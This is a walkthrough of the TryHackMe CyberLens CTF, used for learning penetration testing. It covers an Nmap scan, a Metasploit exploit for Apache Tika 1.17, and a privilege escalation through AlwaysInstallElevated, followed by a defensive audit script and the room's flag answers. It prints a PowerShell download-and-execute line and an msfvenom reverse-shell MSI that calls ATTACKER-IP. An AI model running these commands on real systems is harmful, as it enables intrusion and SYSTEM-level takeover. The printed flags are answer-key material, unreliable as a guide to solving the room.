We covered a very easy penetration testing challenge where we started with an Nmap scan followed by web enumeration, then found a vulnerability in Apache Tika version 1.17 for which a ready-made exploit is available in Metasploit.
Using Metasploit, the vulnerability was exploited and initial access was obtained; privileges were then escalated on the Windows machine after the exploit suggester showed that AlwaysInstallElevated is enabled. This was part of the TryHackMe CyberLens CTF.
Task Scenario
Welcome to the clandestine world of CyberLens, where shadows dance amidst the digital domain and metadata reveals the secrets that lie concealed within every image. As you embark on this thrilling journey, prepare to unveil the hidden matrix of information that lurks beneath the surface, for here at CyberLens, we make metadata our playground.
In this labyrinthine realm of cyber security, we have mastered the arcane arts of digital forensics and image analysis. Armed with advanced techniques and cutting-edge tools, we delve into the very fabric of digital images, peeling back layers of information to expose the unseen stories they yearn to tell.
Picture yourself as a modern-day investigator, equipped not only with technical prowess but also with a keen eye for detail. Our team of elite experts will guide you through the intricate paths of image analysis, where file structures and data patterns provide valuable insights into the origins and nature of digital artifacts.
At CyberLens, we believe that every pixel holds a story, and it is our mission to decipher those stories and extract the truth. Join us on this exciting adventure as we navigate the digital landscape and uncover the hidden narratives that await us at every turn.
Can you exploit the CyberLens web server and discover the hidden flags?
Highlights
Nmap scanning output
# nmap -A 10.10.189.206
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-18 09:40 EDT
Nmap scan report for cyberlens.thm (10.10.189.206)
Host is up (0.10s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.57 ((Win64))
|_http-server-header: Apache/2.4.57 (Win64)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: CyberLens: Unveiling the Hidden Matrix
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=CyberLens
| Not valid before: 2024-05-17T13:10:13
|_Not valid after: 2024-11-16T13:10:13
| rdp-ntlm-info:
| Target_Name: CYBERLENS
| NetBIOS_Domain_Name: CYBERLENS
| NetBIOS_Computer_Name: CYBERLENS
| DNS_Domain_Name: CyberLens
| DNS_Computer_Name: CyberLens
| Product_Version: 10.0.17763
|_ System_Time: 2024-05-18T13:47:39+00:00
|_ssl-date: 2024-05-18T13:47:47+00:00; -10s from scanner time.
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7)... redacted ...
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-05-18T13:47:41
|_ start_date: N/A
|_clock-skew: mean: -10s, deviation: 0s, median: -10s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
TRACEROUTE (using port 587/tcp)
HOP RTT ADDRESS
1 125.60 ms 10.9.0.1
2 121.35 ms cyberlens.thm (10.10.189.206)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 464.64 seconds
Exploiting Windows using Metasploit
According to the enumeration, the service running on port 61777 is Apache Tika 1.17, which is vulnerable. (Port 61777 is not among the 1000 ports covered by the default Nmap scan above, which is why it does not appear in that output.)
Below is the right Metasploit module for this vulnerability:
msf > use exploit/windows/http/apache_tika_jp2_jscript
msf exploit(apache_tika_jp2_jscript) > show targets
...targets...
msf exploit(apache_tika_jp2_jscript) > set TARGET <target-id>
msf exploit(apache_tika_jp2_jscript) > show options
...show and set options...
msf exploit(apache_tika_jp2_jscript) > exploit
Module Description from Rapid7:
This module exploits a command injection vulnerability in Apache Tika 1.15 – 1.17 on Windows. A file with the image/jp2 content-type is used to bypass magic bytes checking. When OCR is specified in the request, parameters can be passed to change the parameters passed at command line to allow for arbitrary JScript to execute. A JScript stub is passed to execute arbitrary code. This module was verified against version 1.15 – 1.17 on Windows 2012. While the CVE and finding show more versions vulnerable, during testing it was determined only > 1.14 was exploitable due to jp2 support being added.
Downloading and executing the PowerUp script to perform Windows privilege escalation
# target machine
iex (iwr -usebasicparsing http://ATTACKER-IP/PowerUp.ps1)
PS C:\Users\CyberLens\Desktop> Invoke-AllChecks
Generating and executing an MSI payload using Msfvenom
# attacker machine
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER-IP LPORT=4546 -f msi > shell.msi
# target machine (in PowerShell, wget is an alias of Invoke-WebRequest; the file name must match the one served)
wget http://ATTACKER-IP/shell.msi -OutFile C:\temp\shell.msi
msiexec /quiet /qn /i C:\temp\shell.msi
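The escalation above only works because both the machine-wide and the per-user AlwaysInstallElevated values are set to 1. The following audit and remediation script is an added example (not part of the original write-up or the PowerUp project) that reports whether that condition holds on a host and resets the values; function names are my own.

```powershell
# Added audit helper (not from the original write-up). AlwaysInstallElevated only
# takes effect when BOTH the HKLM and the HKCU value are 1; a missing key or value
# means "not configured" and is treated as 0.
function Test-AlwaysInstallElevated {
    $paths = @{
        Machine = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
        User    = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    }
    $state = @{}
    foreach ($scope in $paths.Keys) {
        $item = Get-ItemProperty -Path $paths[$scope] -Name AlwaysInstallElevated `
                                 -ErrorAction SilentlyContinue
        $state[$scope] = if ($null -eq $item) { 0 } else { [int]$item.AlwaysInstallElevated }
    }
    $enabled = ($state.Machine -eq 1) -and ($state.User -eq 1)
    [PSCustomObject]@{
        MachineValue = $state.Machine
        UserValue    = $state.User
        Enabled      = $enabled
        Finding      = if ($enabled) {
            'AlwaysInstallElevated is enabled: any MSI this user runs installs as SYSTEM'
        } else {
            'AlwaysInstallElevated is not enabled'
        }
    }
}

# Remediation: set both values to 0. Writing HKLM requires an elevated shell, and
# HKCU only covers the current user, so the durable fix is the equivalent
# Group Policy setting ("Always install with elevated privileges" = Disabled).
function Disable-AlwaysInstallElevated {
    $paths = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
             'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    foreach ($path in $paths) {
        if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
        Set-ItemProperty -Path $path -Name AlwaysInstallElevated -Value 0 -Type DWord
    }
    Test-AlwaysInstallElevated
}

# Usage: audit first, then remediate from an elevated prompt.
Test-AlwaysInstallElevated | Format-List
```

Running the audit before and after the fix gives a clear before/after record for the finding; on the CTF box the audit returns Enabled = True until both values are cleared.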
Room Answers | TryHackMe CyberLens CTF
What is the user flag?
THM{T1k4-CV3-f0r-7h3-w1n}
What is the admin flag?
THM{3lev@t3D-4-pr1v35c!}
Video Walkthrough | TryHackMe CyberLens CTF